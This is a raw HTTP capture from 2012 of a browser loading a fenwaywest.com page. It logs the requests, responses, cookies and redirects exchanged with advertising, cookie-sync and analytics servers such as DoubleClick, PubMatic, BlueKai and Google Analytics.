Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: DCLK-AdSvr
Content-Length: 267
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:38 GMT
GET /context_sync?call_type=iframe HTTP/1.1

Host: contextweb.pixel.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:38 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 151
Connection: close
Server: Jetty(7.3.1.v20110307)
Set-Cookie: impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
GET ///www/delivery/ajs.php?zoneid=95032&username=bloguin&numAds=1&premium=1&eleid=lijit_region_95032&abf=true&tid=95032_1353298658273e3751f284eda&lijit_kw=&cb=24722688839&flv=10.0.45&time=05:17:38&ifr=1&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&od=fenwaywest.com&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: apr.lijit.com
GET ///www/delivery/ajs.php?zoneid=95032&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95032&amp;abf=true&amp;tid=95032_1353298658273e3751f284eda&amp;lijit_kw=&amp;cb=24722688839&amp;flv=10.0.45&amp;time=05:17:38&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; expires=Tue, 19-Nov-2013 04:17:38 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1215
Connection: close
GET /site/5969 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Found

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Set-Cookie: bkc=KJynas5QisaCRci6SVD99h999Oho9NR=; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bklc=0; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bko=; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bkp1=; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bku=DHz99mv03PelwF+4; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bkw5=; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:38 GMT; path=/; domain=.bluekai.com
Location: http://tags.bluekai.com/site/5969?dt=0&amp;r=193666291&amp;sig=2166136261&amp;bkca=KJye999999W=
BK-Server: 72ef
Content-Length: 0
GET /AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24363&kadheight=250&kadwidth=300&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-19%205:17:38&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&prevkadIds=24361&pmUniAdId=top_0_1&ranreq=0.07518536242931384&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php HTTP/1.1

Host: showads.pubmatic.com
GET /AdServer/AdServerServlet?pubId=28596&amp;siteId=28597&amp;adId=24363&amp;kadheight=250&amp;kadwidth=300&amp;inIframe=1&amp;operId=3&amp;kbgColor=498A72&amp;ktextColor=191919&amp;klinkColor=A60B1D&amp;kltstamp=2012-11-19%205:17:38&amp;timezone=1&amp;screenResolution=1176x885&amp;adPosition=-1x-1&amp;frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&amp;prevkadIds=24361&amp;pmUniAdId=top_0_1&amp;ranreq=0.07518536242931384&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:; KTPCACOOKIE=YES; DPPIX_ON=YES; SYNCUPPIX_ON=YES; KRTBCOOKIE_80=1336-db273952-68a4-4097-8df2-7d98b16e5711.; PUBRETARGET=390_1361074657
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache
Set-Cookie: PUBMDCID=3; domain=pubmatic.com; expires=Tue, 19-Nov-2013 04:17:38 GMT; path=/ KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; domain=pubmatic.com; expires=Tue, 19-Nov-2013 04:17:38 GMT; path=/ _curtime=1353298658; domain=pubmatic.com; expires=Mon, 19-Nov-2012 05:27:38 GMT; path=/ pubfreq_28597_24363_1615290777=243-1; domain=pubmatic.com; expires=Mon, 19-Nov-2012 04:57:38 GMT; path=/ PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 20-Nov-2012 04:17:38 GMT; path=/
X-ktk: ADS2057
Vary: Accept-Encoding
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /bh/rtset?do=add&pid=538569&ev=db273952-68a4-4097-8df2-7d98b16e5711 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=538569&amp;ev=db273952-68a4-4097-8df2-7d98b16e5711 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://contextweb.pixel.invitemedia.com/context_sync?call_type=iframe
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353298658421|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569..0.0.1353298658421|545979..0.0.1353298658421|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739..0.0.1353298658421|537583..0.0.1353298658421|547259..0.0.1353298658421
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-59-195
Date: Mon, 19 Nov 2012 04:17:38 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:38 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739..0.0.1353298658421|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:38 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /adserver/ako?rsi_random=733770519&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=160&rsi_height=600&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=733770519&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=A7798C53EBE3A118D71E950376C2B010&amp;rsi_width=160&amp;rsi_height=600&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_title=&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;MLuBM15VA1wBU9RGEhNBG1ITQxIVABP8ENoBQkMWVBRaF0cTcF20tNgLxppt8AlAFw9vaz9Aavk=&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:37 GMT
GET /AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24363&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=1&kadwidth=300&kadheight=250&kadsizeid=9&kltstamp=1353298658&indirectAdId=0&adServerOptimizerId=2&ranreq=0.07518536242931384&kpbmtpfact=0.437691&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: track.pubmatic.com
GET /AdServer/AdDisplayTrackerServlet?operId=1&amp;pubId=28596&amp;siteId=28597&amp;adId=24363&amp;adServerId=243&amp;kefact=0.400000&amp;kaxefact=0.400000&amp;kadNetFrequecy=1&amp;kadwidth=300&amp;kadheight=250&amp;kadsizeid=9&amp;kltstamp=1353298658&amp;indirectAdId=0&amp;adServerOptimizerId=2&amp;ranreq=0.07518536242931384&amp;kpbmtpfact=0.437691&amp;carrierid=-1&amp;campaignId=1336&amp;creativeId=0&amp;pctr=0.000000&amp;wDSPByrId=230&amp;imprCap=1&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:; KTPCACOOKIE=YES; DPPIX_ON=YES; SYNCUPPIX_ON=YES; KRTBCOOKIE_80=1336-db273952-68a4-4097-8df2-7d98b16e5711.; PUBRETARGET=390_1361074657; _curtime=1353298658; pubfreq_28597_24363_1615290777=243-1
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /__utm.gif?utmwv=5.3.8&utms=1&utmn=616745867&utmhn=fenwaywest.com&utmt=event&utme=5(Loaded%20with%20URL%20-%20JS*1061_p*http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php)&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1036901304&utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&utmp=%2Fmedia%2Findex.php&utmac=UA-2526960-16&utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=wAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=1&amp;utmn=616745867&amp;utmhn=fenwaywest.com&amp;utmt=event&amp;utme=5(Loaded%20with%20URL%20-%20JS*1061_p*http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php)&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1036901304&amp;utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-2526960-16&amp;utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=wAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 231584
Server: GFE/2.0
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4377&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&exch_id=7&line_item_id=1850887&b=rh250.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=F47478FD-881F-434F-8330-33022F73830C&us_id=5543&invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&pub_line_item_id=87821&mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&inv_size_id=146842&campaign_id=252144&p_us_id=28812 HTTP/1.1

Host: eeu.rtb.prod2.invitemedia.com
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711
HTTP/1.1 200 OK

Content-Type: text/html
Connection: close
Content-Length: 3566
Date: Mon, 19 Nov 2012 04:17:38 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(7.3.1.v20110307)
GET /site/5969?dt=0&r=193666291&sig=2166136261&bkca=KJye999999W= HTTP/1.1

Host: tags.bluekai.com
GET /site/5969?dt=0&amp;r=193666291&amp;sig=2166136261&amp;bkca=KJye999999W= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: bkc=KJynas5QisaCRci6SVD99h999Oho9NR=; bklc=0; bko=; bkp1=; bku=DHz99mv03PelwF+4; bkw5=; bkdc=snv
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Expires: Tue, 20 Nov 2012 04:17:38 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bkc=KJpM8sJQtem5QKcHooDOM9y1eJh94rkDPcTYsC2WydiOTQy1GRKRDwQ4+bc0lbwhRNQxIQsv2C88; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bklc=50a9b2e2; expires=Sat, 18-May-2013 04:17:38 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:38 GMT; path=/; domain=.bluekai.com
BK-Server: ad99
Content-Length: 62
nnCoection: close
GET /imp?Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: rsiPus_AAAA=&quot;MLuBM15VA1wBU9RGEhNBG1ITQxIVABP8ENoBQkMWVBRaF0cTcF20tNgLxppt8AlAFw9vaz9Aavk=&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 714
GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=11&amp;type=sync&amp;redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x1083 4227
Cache-Control: no-cache
